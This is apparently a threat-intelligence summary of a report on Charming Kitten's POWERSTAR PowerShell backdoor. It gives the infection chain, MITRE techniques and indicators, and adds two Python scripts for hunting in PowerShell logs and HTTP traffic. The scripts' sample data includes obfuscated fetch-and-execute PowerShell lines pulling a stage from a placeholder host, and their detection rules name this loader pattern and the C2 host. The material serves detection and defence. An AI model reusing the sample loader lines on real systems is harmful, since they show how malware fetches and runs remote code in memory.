Charming Kitten Updates POWERSTAR with an InterPlanetary Twist

Volexity analyzed a new POWERSTAR backdoor variant used by Charming Kitten that loads most of its functionality in memory and retrieves decryption and configuration components from remote cloud and IPFS-hosted files. The malware uses staged PowerShell loaders, dynamic C2 updates (including an IPFS-based fallback), and expanded modules for persistence, discovery, and cleanup. #POWERSTAR #CharmingKitten

Keypoints

  • Charming Kitten distributed an updated POWERSTAR via spear-phishing that used a password-protected RAR containing a malicious LNK to start the chain.
  • The LNK downloads an initial PowerShell script from a Backblaze B2 bucket and executes additional encrypted PowerShell stages in memory using Invoke-Expression.
  • POWERSTAR separates its AES decryption routine from the initial payload by hosting the decryptor and config remotely; without that remote file the payload crashes, limiting analysis and enabling a kill-switch.
  • The backdoor supports multiple C2 channels (attacker servers, cloud hosts, and IPFS) and can retrieve updated C2 addresses from IPFS CIDs via a list of IPFS gateways.
  • Built-in modules provide reconnaissance (systeminfo, process listing), file crawling, persistence (Registry Run keys, startup tasks), remote code execution (PowerShell and C#), and an expanded Cleanup module that removes artifacts and stops processes.
  • POWERSTAR communicates initial system info and a hardcoded victim identifier to a C2 (example: fuschia-rhinestone.cleverapps[.]io) and can receive multiple commands per response with a defined command-field structure.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Delivered a password-protected RAR containing a malicious LNK that initiates the infection chain. (‘password-protected RAR file containing a malicious LNK file’)
  • [T1059.001] PowerShell – Stages executed PowerShell in memory via obfuscated Invoke-Expression calls to decode, download, and run subsequent scripts. (‘executed in memory via an obfuscated call to the Invoke-Expression alias, gcm i*x’)
  • [T1105] Ingress Tool Transfer – The LNK and initial script download additional POWERSTAR components and modules from Backblaze and attacker-controlled infrastructure. (‘downloads POWERSTAR from Backblaze and attacker-controlled infrastructure’)
  • [T1102] Web Service – Malware uses cloud hosting and public services (OneDrive, S3, Backblaze, Clever Cloud) and IPFS as channels for hosting payloads and configs. (‘use of the InterPlanetary File System (IPFS), as well as remotely hosting its decryption function and configuration details on publicly accessible cloud hosting’)
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence established via Registry Run keys and Startup tasks to execute dropped payloads on reboot. (‘Persistence via Startup tasks, Registry Run keys’)
  • [T1082] System Information Discovery – Initial payload collects system information and sends it with a victim identifier to the C2 via POST. (‘collects a small amount of system information from the compromised machine and sends it via a POST request to the C2’)
  • [T1057] Process Discovery – A module enumerates running processes using tasklist and stores results for exfiltration. (‘Enumerates running processes via “tasklist”’)
  • [T1083] File and Directory Discovery – File Crawler module recursively traverses drives to find files matching specific extensions and reports metadata to C2. (‘recursively traverse all directories to search for files matching specific extensions’)
  • [T1070.004] Indicator Removal on Host: File Deletion – Cleanup module deletes persistence registry keys, stops processes, and removes files and logs to hinder forensic analysis. (‘Deletes all the persistence-related registry keys and corresponding files’)

Indicators of Compromise

  • [Domain / C2] C2 subdomain observed – fuschia-rhinestone.cleverapps[.]io (Clever Cloud instance)
  • [File names] Remote stage and config files – cettj34c.txt, k24510.txt (downloaded from Backblaze B2 and decoded by initial PowerShell)
  • [File paths] Local artifacts and identifiers – %APPDATA%\Microsoft\Windows\npv.txt (victim identifier), %APPDATA%\Microsoft\Notepad\Processes.txt (process listing)
  • [Cloud / Hosting] Hosting platforms used for delivery – Backblaze B2 URL(s) for initial loader, AWS S3/OneDrive/Dropbox historically, and IPFS CIDs for dynamic C2 (and other cloud-hosted files)

The infection begins with a targeted spear-phish that builds rapport with the target before sending a password-protected RAR containing a malicious LNK. When the LNK is executed, it downloads an initial PowerShell loader from a Backblaze B2 bucket and runs it in memory via an obfuscated Invoke-Expression call; that loader contains encrypted blobs and logic to decode a second Backblaze URL, fetch the AES decryptor/config (e.g., k24510.txt), and use that remote AES routine to decrypt and execute the primary in-memory POWERSTAR payload.
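The loader chain above leaves a recognisable footprint in PowerShell script-block logging (Event ID 4104): the wildcard `gcm i*x` lookup that resolves the `iex` alias without ever spelling out Invoke-Expression, the remote stage file names, and the local artifact paths. The following is an added detection example written for this summary; it is not Volexity's code and not part of the report. The script-block text it scans is constructed sample data, and the Backblaze-style download host (`b2-host.invalid`) is a placeholder, since the report does not publish the real bucket URL.

```python
import re
from typing import Dict, List, Tuple

# Hunting rules for PowerShell script-block log text (Event ID 4104 content).
# File names and paths are the ones listed in the IoC section of this summary.
RULES: Dict[str, "re.Pattern[str]"] = {
    # "gcm i*x" / "Get-Command i*x" resolves the iex alias through a wildcard,
    # so the literal string "Invoke-Expression" never appears in the script.
    "iex_alias_wildcard": re.compile(
        r"\b(?:gcm|get-command)\s+i\*x\b", re.IGNORECASE),
    # Remote stage / decryptor-config file names named in the report.
    "powerstar_stage_filename": re.compile(
        r"\b(?:cettj34c|k24510)\.txt\b", re.IGNORECASE),
    # Local artifact paths named in the report (victim id and process listing).
    "powerstar_artifact_path": re.compile(
        r"(?:\\Windows\\npv\.txt|\\Notepad\\Processes\.txt)\b", re.IGNORECASE),
    # Fetch-and-invoke pattern: downloaded text piped straight into a call
    # operator, i.e. the stage never touches disk.
    "downloadstring_to_invoke": re.compile(
        r"DownloadString\s*\(.*?\)\s*\|\s*[&.]\s*\(", re.IGNORECASE | re.DOTALL),
}

# Constructed sample script blocks (block id, script text); not real telemetry.
SAMPLE_SCRIPT_BLOCKS: List[Tuple[str, str]] = [
    ("block-1", "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"),
    ("block-2", "$d=[Convert]::FromBase64String($b); "
                "&(gcm i*x) ([Text.Encoding]::UTF8.GetString($d))"),
    ("block-3", "& (GeT-CoMmAnD i*X) $payload"),
    ("block-4", "(New-Object Net.WebClient).DownloadString("
                "'https://b2-host.invalid/file/bucket/cettj34c.txt') | &(gcm i*x)"),
    ("block-5", "Set-Content \"$env:APPDATA\\Microsoft\\Windows\\npv.txt\" $victimId"),
    ("block-6", "Invoke-Expression (Get-Content .\\build.ps1 -Raw)"),
]


def scan_script_block(text: str) -> List[str]:
    """Return the names of every rule that matches one script block."""
    return [name for name, pattern in RULES.items() if pattern.search(text)]


def scan_script_blocks(blocks: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map block id -> matched rule names, omitting blocks with no findings."""
    findings: Dict[str, List[str]] = {}
    for block_id, text in blocks:
        hits = scan_script_block(text)
        if hits:
            findings[block_id] = hits
    return findings


if __name__ == "__main__":
    for block_id, hits in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{block_id}: {', '.join(hits)}")
```

Plain `Invoke-Expression` (block-6) is deliberately not a rule on its own: it is far too common in legitimate administration to alert on, whereas the wildcard alias lookup almost never appears outside obfuscated tooling. The artifact-path rule is only useful where script-block logging captures the full script; the file names in the stage rule are specific to this campaign and will rotate.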

Once active, POWERSTAR posts a small system profile and a hardcoded victim identifier to its C2 (observed: fuschia-rhinestone.cleverapps[.]io), accepts multi-field commands (language~Command~threadname~startstop separated by special delimiters), and supports PowerShell and C# execution. The framework dynamically updates AES keys via the C2, randomizes IVs (sent in the Content-DPR header), and downloads additional modules in memory (screenshot, processes, applications, file crawler, persistence monitor, cleanup, etc.). Persistence is established via Registry Run keys and startup scripts; a separate Persistence module drops an IPFS-oriented payload that reads a CID from a list of IPFS gateways to retrieve updated C2 addresses if needed.
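Two of the C2 characteristics above are cheap to hunt for in proxy or web-server telemetry: the observed C2 host, and the abuse of the `Content-DPR` header to carry a randomised IV. A genuine `Content-DPR` value is a small decimal device-pixel ratio such as `1` or `1.5`, and the Client Hints specification defines it as a response header (browsers send `DPR` in requests), so an IV-sized value, or any `Content-DPR` on a client request, stands out. The code below is an added example for this summary, not Volexity's or the malware's code; the HTTP events are constructed samples, the IV-looking values are made up, and the C2 hostname is the report's defanged indicator refanged.

```python
import re
from typing import Dict, List

# Refanged from the defanged IoC in the report: fuschia-rhinestone.cleverapps[.]io
KNOWN_C2_HOSTS = {"fuschia-rhinestone.cleverapps.io"}

# A legitimate Content-DPR value is a small decimal pixel ratio ("1", "1.5", "2").
_DPR_VALUE = re.compile(r"^\d{1,2}(?:\.\d{1,3})?$")


def is_plausible_dpr(value: str) -> bool:
    """True if the header value looks like a real device-pixel ratio."""
    value = value.strip()
    if not _DPR_VALUE.match(value):
        return False
    return 0 < float(value) <= 10


def inspect_http_event(event: dict) -> List[str]:
    """Return finding names for one HTTP event (request or response record)."""
    findings: List[str] = []
    headers = {k.lower(): v for k, v in event.get("headers", {}).items()}
    if event.get("host", "").lower() in KNOWN_C2_HOSTS:
        findings.append("known_c2_host")
    if "content-dpr" in headers:
        # Content-DPR is a response header in the Client Hints spec; a client
        # emitting it is already anomalous regardless of the value.
        if event.get("direction") == "request":
            findings.append("content_dpr_in_request")
        # A base64 or hex IV is nothing like "1.5".
        if not is_plausible_dpr(headers["content-dpr"]):
            findings.append("content_dpr_not_a_pixel_ratio")
    return findings


def hunt_http_events(events: List[dict]) -> Dict[str, List[str]]:
    """Map event id -> findings, omitting events with nothing to report."""
    return {e["id"]: hits for e in events if (hits := inspect_http_event(e))}


# Constructed sample events; hostnames other than the IoC are placeholders.
SAMPLE_HTTP_EVENTS: List[dict] = [
    {"id": "evt-1", "direction": "request", "method": "GET",
     "host": "www.example.com", "path": "/img/logo.png", "headers": {"DPR": "2"}},
    {"id": "evt-2", "direction": "response", "method": "GET",
     "host": "www.example.com", "path": "/img/logo.png", "headers": {"Content-DPR": "2"}},
    {"id": "evt-3", "direction": "request", "method": "POST",
     "host": "fuschia-rhinestone.cleverapps.io", "path": "/",
     "headers": {"Content-DPR": "q7XQ3kTDbHk1Zb1tA4v2Pw==", "Content-Type": "text/plain"}},
    {"id": "evt-4", "direction": "response", "method": "POST",
     "host": "relay.example.invalid", "path": "/api",
     "headers": {"Content-DPR": "4a7f9c0e1b2d3f4a5b6c7d8e9f0a1b2c"}},
    {"id": "evt-5", "direction": "response", "method": "GET",
     "host": "www.example.com", "path": "/hero.jpg", "headers": {"Content-DPR": "1.5"}},
]


if __name__ == "__main__":
    for event_id, hits in hunt_http_events(SAMPLE_HTTP_EVENTS).items():
        print(f"{event_id}: {', '.join(hits)}")
```

The header rule is the durable one: the C2 host will change between campaigns, but reusing a standards-defined header as an IV carrier is a design choice that survives infrastructure rotation. Because the report does not state which direction the header travels, the code checks the value in both requests and responses and only adds the direction finding for requests.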

Defensive evasion is emphasized: the decryption routine is hosted remotely and not written to disk (preventing static decryption), execution happens in-memory, and a multi-level Cleanup module can remove logs, stop processes, delete persistence artifacts, and remove files associated with later executable stages. The File Crawler enumerates drives and collects metadata on matched file extensions, while the Persistence Monitor reports the presence of registry keys and files back to the C2; IPFS is used as a resilient fallback for C2 distribution, preventing easy takedown of the remote config/CID by third-party hosts.

Read more: https://www.volexity.com/blog/2023/06/28/charming-kitten-updates-powerstar-with-an-interplanetary-twist/